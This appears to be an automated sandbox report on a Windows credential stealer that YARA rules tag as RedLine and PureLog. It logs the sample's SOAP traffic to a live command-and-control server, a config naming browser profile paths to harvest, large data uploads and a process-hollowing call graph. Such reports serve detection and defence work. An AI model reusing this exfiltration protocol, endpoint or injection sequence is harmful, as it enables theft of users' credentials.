                                                                                                                                                  Dec 4, 2024 13:17:30.626379967 CET5561549744185.222.58.82192.168.2.4
                                                                                                                                                  Dec 4, 2024 13:17:30.626432896 CET5561549744185.222.58.82192.168.2.4
                                                                                                                                                  Dec 4, 2024 13:17:30.626450062 CET5561549744185.222.58.82192.168.2.4
                                                                                                                                                  Dec 4, 2024 13:17:30.626476049 CET5561549744185.222.58.82192.168.2.4
                                                                                                                                                  Dec 4, 2024 13:17:30.626486063 CET5561549744185.222.58.82192.168.2.4
                                                                                                                                                  Dec 4, 2024 13:17:30.626503944 CET5561549744185.222.58.82192.168.2.4
                                                                                                                                                  Dec 4, 2024 13:17:30.626758099 CET5561549744185.222.58.82192.168.2.4
                                                                                                                                                  Dec 4, 2024 13:17:30.626815081 CET5561549744185.222.58.82192.168.2.4
                                                                                                                                                  Dec 4, 2024 13:17:30.626912117 CET5561549744185.222.58.82192.168.2.4
                                                                                                                                                  Dec 4, 2024 13:17:30.626920938 CET5561549744185.222.58.82192.168.2.4
                                                                                                                                                  Dec 4, 2024 13:17:30.626960993 CET5561549744185.222.58.82192.168.2.4
                                                                                                                                                  Dec 4, 2024 13:17:30.626970053 CET5561549744185.222.58.82192.168.2.4
                                                                                                                                                  Dec 4, 2024 13:17:30.627017021 CET5561549744185.222.58.82192.168.2.4
                                                                                                                                                  Dec 4, 2024 13:17:30.627026081 CET5561549744185.222.58.82192.168.2.4
                                                                                                                                                  Dec 4, 2024 13:17:30.627074957 CET5561549744185.222.58.82192.168.2.4
                                                                                                                                                  Dec 4, 2024 13:17:30.627093077 CET5561549744185.222.58.82192.168.2.4
                                                                                                                                                  Dec 4, 2024 13:17:30.627160072 CET5561549744185.222.58.82192.168.2.4
                                                                                                                                                  Dec 4, 2024 13:17:30.627168894 CET5561549744185.222.58.82192.168.2.4
                                                                                                                                                  Dec 4, 2024 13:17:30.627208948 CET5561549744185.222.58.82192.168.2.4
                                                                                                                                                  Dec 4, 2024 13:17:30.627232075 CET5561549744185.222.58.82192.168.2.4
                                                                                                                                                  Dec 4, 2024 13:17:30.628057957 CET5561549744185.222.58.82192.168.2.4
                                                                                                                                                  Dec 4, 2024 13:17:30.628076077 CET5561549744185.222.58.82192.168.2.4
                                                                                                                                                  Dec 4, 2024 13:17:30.628084898 CET5561549744185.222.58.82192.168.2.4
                                                                                                                                                  Dec 4, 2024 13:17:30.644628048 CET5561549744185.222.58.82192.168.2.4
                                                                                                                                                  Dec 4, 2024 13:17:31.610866070 CET5561549744185.222.58.82192.168.2.4
                                                                                                                                                  Dec 4, 2024 13:17:31.630389929 CET4974155615192.168.2.4185.222.58.82
                                                                                                                                                  Dec 4, 2024 13:17:31.630882025 CET4974455615192.168.2.4185.222.58.82
                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Dec 4, 2024 13:17:22.408521891 CET5689153192.168.2.41.1.1.1
                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                  Dec 4, 2024 13:17:22.408521891 CET192.168.2.41.1.1.10x60b5Standard query (0)api.ip.sbA (IP address)IN (0x0001)false
                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                  Dec 4, 2024 13:17:22.816539049 CET1.1.1.1192.168.2.40x60b5No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  • 185.222.58.82:55615
                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  0192.168.2.449733185.222.58.8255615744C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Dec 4, 2024 13:17:15.052273035 CET240OUTPOST / HTTP/1.1
                                                                                                                                                  Content-Type: text/xml; charset=utf-8
                                                                                                                                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                                                                                                                  Host: 185.222.58.82:55615
                                                                                                                                                  Content-Length: 137
                                                                                                                                                  Expect: 100-continue
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Dec 4, 2024 13:17:16.279328108 CET25INHTTP/1.1 100 Continue
                                                                                                                                                  Dec 4, 2024 13:17:16.516541004 CET359INHTTP/1.1 200 OK
                                                                                                                                                  Content-Length: 212
                                                                                                                                                  Content-Type: text/xml; charset=utf-8
                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                  Date: Wed, 04 Dec 2024 12:17:15 GMT
                                                                                                                                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                                                                                                                                                  Dec 4, 2024 13:17:21.586102962 CET223OUTPOST / HTTP/1.1
                                                                                                                                                  Content-Type: text/xml; charset=utf-8
                                                                                                                                                  SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                                                                                                                                                  Host: 185.222.58.82:55615
                                                                                                                                                  Content-Length: 144
                                                                                                                                                  Expect: 100-continue
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Dec 4, 2024 13:17:21.977878094 CET25INHTTP/1.1 100 Continue
                                                                                                                                                  Dec 4, 2024 13:17:22.355334997 CET1236INHTTP/1.1 200 OK
                                                                                                                                                  Content-Length: 4744
                                                                                                                                                  Content-Type: text/xml; charset=utf-8
                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                  Date: Wed, 04 Dec 2024 12:17:21 GMT
                                                                                                                                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED]
                                                                                                                                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string [TRUNCATED]


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  1192.168.2.449741185.222.58.8255615744C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Dec 4, 2024 13:17:26.199942112 CET221OUTPOST / HTTP/1.1
                                                                                                                                                  Content-Type: text/xml; charset=utf-8
                                                                                                                                                  SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                                                                                                                                                  Host: 185.222.58.82:55615
                                                                                                                                                  Content-Length: 934597
                                                                                                                                                  Expect: 100-continue
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Dec 4, 2024 13:17:28.923417091 CET294INHTTP/1.1 200 OK
                                                                                                                                                  Content-Length: 147
                                                                                                                                                  Content-Type: text/xml; charset=utf-8
                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                  Date: Wed, 04 Dec 2024 12:17:27 GMT
                                                                                                                                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  2192.168.2.449744185.222.58.8255615744C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Dec 4, 2024 13:17:29.045960903 CET241OUTPOST / HTTP/1.1
                                                                                                                                                  Content-Type: text/xml; charset=utf-8
                                                                                                                                                  SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                                                                                                  Host: 185.222.58.82:55615
                                                                                                                                                  Content-Length: 934589
                                                                                                                                                  Expect: 100-continue
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Dec 4, 2024 13:17:31.610866070 CET408INHTTP/1.1 200 OK
                                                                                                                                                  Content-Length: 261
                                                                                                                                                  Content-Type: text/xml; charset=utf-8
                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                  Date: Wed, 04 Dec 2024 12:17:30 GMT
                                                                                                                                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                                                                                                                                                  Click to jump to process

                                                                                                                                                  Click to jump to process

                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                  Click to jump to process

                                                                                                                                                  Target ID:0
                                                                                                                                                  Start time:07:17:09
                                                                                                                                                  Start date:04/12/2024
                                                                                                                                                  Path:C:\Users\user\Desktop\MfzXU6tKOq.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\Desktop\MfzXU6tKOq.exe"
                                                                                                                                                  Imagebase:0x10000
                                                                                                                                                  File size:570'880 bytes
                                                                                                                                                  MD5 hash:3D63B777F65056B236BA51180CD37CE0
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1841259145.0000000004FA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1839022362.00000000034C8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.1839022362.00000000034C8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.1839022362.00000000034C8000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1839022362.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1839022362.00000000035C3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.1839022362.00000000035C3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.1839022362.00000000035C3000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:3
                                                                                                                                                  Start time:07:17:13
                                                                                                                                                  Start date:04/12/2024
                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                                                                  Imagebase:0x480000
                                                                                                                                                  File size:45'984 bytes
                                                                                                                                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1991404518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000003.00000002.1991404518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000003.00000002.1991404518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:4
                                                                                                                                                  Start time:07:17:13
                                                                                                                                                  Start date:04/12/2024
                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  Reset < >

                                                                                                                                                    Execution Graph

                                                                                                                                                    Execution Coverage:9.8%
                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                    Signature Coverage:3.5%
                                                                                                                                                    Total number of Nodes:260
                                                                                                                                                    Total number of Limit Nodes:11
                                                                                                                                                    execution_graph 38420 6b4668 38421 6b467a 38420->38421 38422 6b4686 38421->38422 38426 6b4778 38421->38426 38431 6b3e34 38422->38431 38424 6b46a5 38427 6b479d 38426->38427 38435 6b4879 38427->38435 38439 6b4888 38427->38439 38432 6b3e3f 38431->38432 38447 6b5c64 38432->38447 38434 6b6ff7 38434->38424 38436 6b48af 38435->38436 38437 6b498c 38436->38437 38443 6b44b4 38436->38443 38440 6b48af 38439->38440 38441 6b498c 38440->38441 38442 6b44b4 CreateActCtxA 38440->38442 38442->38441 38444 6b5918 CreateActCtxA 38443->38444 38446 6b59db 38444->38446 38448 6b5c6f 38447->38448 38451 6b5c84 38448->38451 38450 6b70c5 38450->38434 38452 6b5c8f 38451->38452 38455 6b5cb4 38452->38455 38454 6b71a2 38454->38450 38456 6b5cbf 38455->38456 38459 6b5ce4 38456->38459 38458 6b72a5 38458->38454 38460 6b5cef 38459->38460 38462 6b85ab 38460->38462 38466 6bac58 38460->38466 38461 6b85e9 38461->38458 38462->38461 38471 6bcd4f 38462->38471 38476 6bcd50 38462->38476 38467 6bac68 38466->38467 38481 6bac7f 38467->38481 38486 6bac90 38467->38486 38468 6bac6e 38468->38462 38472 6bcd71 38471->38472 38473 6bcd95 38472->38473 38500 6bceff 38472->38500 38504 6bcf00 38472->38504 38473->38461 38477 6bcd71 38476->38477 38478 6bcd95 38477->38478 38479 6bceff 2 API calls 38477->38479 38480 6bcf00 2 API calls 38477->38480 38478->38461 38479->38478 38480->38478 38482 6bac90 38481->38482 38490 6bad79 38482->38490 38495 6bad88 38482->38495 38483 6bac9f 38483->38468 38488 6bad79 GetModuleHandleW 38486->38488 38489 6bad88 GetModuleHandleW 38486->38489 38487 6bac9f 38487->38468 38488->38487 38489->38487 38491 6bad88 38490->38491 38492 6badbc 38491->38492 38493 6bafc0 GetModuleHandleW 38491->38493 38492->38483 38494 6bafed 38493->38494 38494->38483 38496 6badbc 38495->38496 38497 6bad99 38495->38497 38496->38483 38497->38496 38498 6bafc0 GetModuleHandleW 38497->38498 38499 6bafed 38498->38499 38499->38483 38501 6bcf0d 38500->38501 38503 6bcf47 38501->38503 38508 6bb760 38501->38508 38503->38473 38505 6bcf0d 38504->38505 38506 6bcf47 38505->38506 38507 6bb760 2 API calls 38505->38507 38506->38473 38507->38506 38509 6bb76b 38508->38509 38511 6bdc58 38509->38511 38512 6bd064 38509->38512 38511->38511 38513 6bd06f 38512->38513 38514 6b5ce4 2 API calls 38513->38514 38515 6bdcc7 38514->38515 38515->38511 38707 6bd418 38708 6bd45e 38707->38708 38712 6bd5e9 38708->38712 38715 6bd5f8 38708->38715 38709 6bd54b 38718 6bb770 38712->38718 38716 6bb770 DuplicateHandle 38715->38716 38717 6bd626 38715->38717 38716->38717 38717->38709 38719 6bd660 DuplicateHandle 38718->38719 38720 6bd626 38719->38720 38720->38709 38665 4927278 38666 49272a5 38665->38666 38677 4926994 38666->38677 38672 4927395 38673 4926994 2 API calls 38672->38673 38674 49273c7 38673->38674 38675 4927074 2 API calls 38674->38675 38676 49273f9 38675->38676 38678 492699f 38677->38678 38690 4927224 38678->38690 38680 4927331 38681 4927074 38680->38681 38682 492707f 38681->38682 38702 492df50 38682->38702 38684 4927363 38685 4927084 38684->38685 38686 492708f 38685->38686 38687 492fa03 38686->38687 38688 6b82eb 2 API calls 38686->38688 38689 6b5ce4 2 API calls 38686->38689 38687->38672 38688->38687 38689->38687 38691 492722f 38690->38691 38692 4928472 38691->38692 38694 6b5ce4 2 API calls 38691->38694 38695 6b82eb 38691->38695 38692->38680 38694->38692 38696 6b82f8 38695->38696 38698 6b85ab 38696->38698 38699 6bac58 2 API calls 38696->38699 38697 6b85e9 38697->38692 38698->38697 38700 6bcd4f 2 API calls 38698->38700 38701 6bcd50 2 API calls 38698->38701 38699->38698 38700->38697 38701->38697 38703 492df5b 38702->38703 38705 6b82eb 2 API calls 38703->38705 38706 6b5ce4 2 API calls 38703->38706 38704 492f37c 38704->38684 38705->38704 38706->38704 38721 66d01c 38722 66d034 38721->38722 38723 66d08e 38722->38723 38726 4922818 38722->38726 38731 4922808 38722->38731 38727 4922845 38726->38727 38728 4922877 38727->38728 38736 4922d88 38727->38736 38741 4922da8 38727->38741 38728->38728 38732 4922845 38731->38732 38733 4922877 38732->38733 38734 4922d88 2 API calls 38732->38734 38735 4922da8 2 API calls 38732->38735 38733->38733 38734->38733 38735->38733 38738 4922dbc 38736->38738 38737 4922e48 38737->38728 38746 4922e50 38738->38746 38749 4922e60 38738->38749 38743 4922dbc 38741->38743 38742 4922e48 38742->38728 38744 4922e50 2 API calls 38743->38744 38745 4922e60 2 API calls 38743->38745 38744->38742 38745->38742 38747 4922e71 38746->38747 38752 4924022 38746->38752 38747->38737 38750 4922e71 38749->38750 38751 4924022 2 API calls 38749->38751 38750->38737 38751->38750 38756 4924050 38752->38756 38760 4924040 38752->38760 38753 492403a 38753->38747 38757 4924092 38756->38757 38759 4924099 38756->38759 38758 49240ea CallWindowProcW 38757->38758 38757->38759 38758->38759 38759->38753 38761 4924092 38760->38761 38763 4924099 38760->38763 38762 49240ea CallWindowProcW 38761->38762 38761->38763 38762->38763 38763->38753 38516 6abc3b0 38521 6abd11e 38516->38521 38526 6abd0c0 38516->38526 38530 6abd0b1 38516->38530 38517 6abc3bf 38522 6abd0ac 38521->38522 38524 6abd121 38521->38524 38534 6abd420 38522->38534 38523 6abd0fe 38523->38517 38524->38517 38529 6abd0da 38526->38529 38527 6abd0fe 38527->38517 38528 6abd420 12 API calls 38528->38527 38529->38528 38531 6abd0da 38530->38531 38533 6abd420 12 API calls 38531->38533 38532 6abd0fe 38532->38517 38533->38532 38535 6abd445 38534->38535 38542 6abd457 38535->38542 38549 6abd8f0 38535->38549 38554 6abdf1c 38535->38554 38559 6abda39 38535->38559 38563 6abd565 38535->38563 38568 6abdba6 38535->38568 38577 6abd800 38535->38577 38581 6abd9ec 38535->38581 38585 6abd9aa 38535->38585 38590 6abd8d6 38535->38590 38595 6abd776 38535->38595 38600 6abdc97 38535->38600 38605 6abdb30 38535->38605 38542->38523 38550 6abd8f6 38549->38550 38609 6abbb68 38550->38609 38613 6abbb70 38550->38613 38551 6abd92b 38555 6abd92b 38554->38555 38556 6abd907 38554->38556 38557 6abbb68 WriteProcessMemory 38556->38557 38558 6abbb70 WriteProcessMemory 38556->38558 38557->38555 38558->38555 38560 6abd9eb 38559->38560 38560->38559 38561 6abbb68 WriteProcessMemory 38560->38561 38562 6abbb70 WriteProcessMemory 38560->38562 38561->38560 38562->38560 38564 6abd57e 38563->38564 38617 6abbdf8 38564->38617 38621 6abbded 38564->38621 38569 6abdbaf 38568->38569 38570 6abdbb5 38568->38570 38625 6abb9d8 38569->38625 38629 6abb9d1 38569->38629 38571 6abdffe 38570->38571 38633 6abb928 38570->38633 38637 6abb921 38570->38637 38571->38542 38572 6abdcd5 38579 6abb9d8 Wow64SetThreadContext 38577->38579 38580 6abb9d1 Wow64SetThreadContext 38577->38580 38578 6abd81a 38578->38542 38579->38578 38580->38578 38583 6abbb68 WriteProcessMemory 38581->38583 38584 6abbb70 WriteProcessMemory 38581->38584 38582 6abd9eb 38582->38581 38583->38582 38584->38582 38641 6abbc58 38585->38641 38645 6abbc60 38585->38645 38586 6abd974 38586->38585 38587 6abde50 38586->38587 38591 6abd8dc 38590->38591 38593 6abb928 ResumeThread 38591->38593 38594 6abb921 ResumeThread 38591->38594 38592 6abdcd5 38593->38592 38594->38592 38596 6abdb63 38595->38596 38598 6abbb68 WriteProcessMemory 38596->38598 38599 6abbb70 WriteProcessMemory 38596->38599 38597 6abdb1d 38598->38597 38599->38597 38601 6abdcc0 38600->38601 38603 6abb928 ResumeThread 38601->38603 38604 6abb921 ResumeThread 38601->38604 38602 6abdcd5 38603->38602 38604->38602 38649 6abbab0 38605->38649 38653 6abbaa9 38605->38653 38606 6abdb4e 38610 6abbb70 WriteProcessMemory 38609->38610 38612 6abbc0f 38610->38612 38612->38551 38614 6abbbb8 WriteProcessMemory 38613->38614 38616 6abbc0f 38614->38616 38616->38551 38618 6abbe81 38617->38618 38618->38618 38619 6abbfe6 CreateProcessA 38618->38619 38620 6abc043 38619->38620 38622 6abbdf8 CreateProcessA 38621->38622 38624 6abc043 38622->38624 38626 6abba1d Wow64SetThreadContext 38625->38626 38628 6abba65 38626->38628 38628->38570 38630 6abb9d8 Wow64SetThreadContext 38629->38630 38632 6abba65 38630->38632 38632->38570 38634 6abb968 ResumeThread 38633->38634 38636 6abb999 38634->38636 38636->38572 38638 6abb928 ResumeThread 38637->38638 38640 6abb999 38638->38640 38640->38572 38642 6abbcab ReadProcessMemory 38641->38642 38644 6abbcef 38642->38644 38644->38586 38646 6abbcab ReadProcessMemory 38645->38646 38648 6abbcef 38646->38648 38648->38586 38650 6abbaf0 VirtualAllocEx 38649->38650 38652 6abbb2d 38650->38652 38652->38606 38654 6abbab0 VirtualAllocEx 38653->38654 38656 6abbb2d 38654->38656 38656->38606 38657 6abe330 38658 6abe4f0 38657->38658 38661 6abe356 38657->38661 38659 6abe4bb 38661->38659 38662 6ab8770 38661->38662 38663 6abe5b0 PostMessageW 38662->38663 38664 6abe61c 38663->38664 38664->38661

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
